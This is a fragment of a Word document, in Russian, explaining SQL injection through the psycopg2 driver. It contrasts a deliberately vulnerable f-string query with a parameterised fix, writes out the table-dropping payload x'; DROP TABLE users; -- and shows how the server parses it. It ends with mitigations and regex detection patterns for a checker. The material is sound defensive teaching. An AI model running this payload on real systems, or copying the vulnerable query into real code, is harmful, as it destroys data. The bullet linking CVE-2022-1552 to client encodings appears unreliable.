        <w:t>Setup.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> psycopg2 (актуальная ветка 2.9.x) — синхронный драйвер на базе libpq. Для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всегда использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>simple query protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) независимо от того, переданы ли параметры. Параметризация в psycopg2 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>клиентская подстановка с экранированием через `adapt()`/`mogrify()`</w:t>
      </w:r>
      <w:r>
        <w:t>, а не передача параметров в extended-protocol. Это означает, что защита от stacked queries в psycopg2 опирается на корректность экранирования кавычек, а не на отказ сервера от мульти-команд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0946DBC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6A0960" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import psycopg2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F6AEE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A06D52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn = psycopg2.connect(dsn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138EAC5F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cur = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63777A39" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7998C202" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def search_users(name: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7457B6BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(f"SELECT id, email FROM users WHERE name = '{name}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A8624" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return cur.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C8FB4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в f-string — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mogrify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не вызывается, экранирования нет, любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уйдёт как разделитель команд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735DAC36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Безопасный код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA47B65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def search_users(name: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201EB220" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute("SELECT id, email FROM users WHERE name = %s", (name,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A446C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return cur.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3BE8E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — placeholder psycopg2 (не % из Python-форматирования). Значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> проходит через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>adapt()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который оборачивает строку в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и удваивает внутренние одиночные кавычки. Получившаяся уже-готовая SQL-строка уходит одной командой через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexec</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E62D0FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF86967" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Единственный режим — simple. Extended-protocol через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> недостижим (psycopg2 не вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexecParams</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F0790C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `name`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F60991A"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47DE48D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит (уязвимый код):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359C79FB"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4F0055EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PQexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсит строку как три statement-а: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, комментарий. Все три исполняются по очереди, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> коммитится в autocommit-режиме. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fetchall()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вернёт результат последней команды (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → пустой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), приложение получит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ProgrammingError: no results to fetch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — но таблица уже удалена.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AECFA00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит (безопасный код):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503FC5D7"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39959BE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>adapt()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> экранировал внутренние </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, весь payload остался внутри литерала. PostgreSQL парсит это как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>один</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> statement с буквальным значением </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x'; DROP TABLE users; --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в WHERE. Стакинга нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8ABBBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что отличает psycopg2 от драйверов с extended-protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54514529" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Защита НЕ опирается на отказ сервера от мульти-команд — сервер их по-прежнему примет, если строка экранирована неправильно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD70744" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Исторически уязвимости появлялись при работе с не-UTF8 кодировками клиента (CVE-2022-1552 для PG, не для psycopg2, но эксплуатация шла через драйвер) и при использовании самописных адаптеров без вызова </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>adapt()</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703E9F94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.executemany()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строит одну SQL-строку с множеством VALUES — те же правила экранирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7CF5D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Динамические идентификаторы (имена таблиц/колонок) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>adapt()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> НЕ покрывает — для них есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psycopg2.sql.SQL().format(Identifier(...))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Конкатенация имени таблицы через f-string в простой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уязвима даже с params для значений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0035C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Mitigations специфичные для драйвера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBDBA7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.execute(sql, params)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, никогда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.execute(f"…{var}…")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>% var</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A80D9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Для динамических identifiers — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psycopg2.sql.SQL("SELECT * FROM {}").format(sql.Identifier(table_name))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121F803B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Перевод на psycopg3 (см. 3.5.2) даёт настоящий extended-protocol — это второй слой защиты, независимый от корректности экранирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D870763" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В коде судьи (rules.py) ловить: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.execute\(f"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.execute\([^,]*\+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.execute\(".*%\s*\w+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text\(f"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20334466" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3B1F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>psycopg2 ≥ 2.0 (вся история ветки) — поведение одинаковое. psycopg2-binary — то же самое, отличия только в сборке. Для перехода на extended-protocol нужен psycopg3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795EC09E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43106B94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   psycopg2 docs: «Passing parameters to SQL queries» — https://www.psycopg.org/docs/usage.html#passing-parameters-to-sql-queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FBE21B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   psycopg2 docs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psycopg2.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для безопасной композиции SQL — https://www.psycopg.org/docs/sql.html</w:t>
      </w:r>
    </w:p>
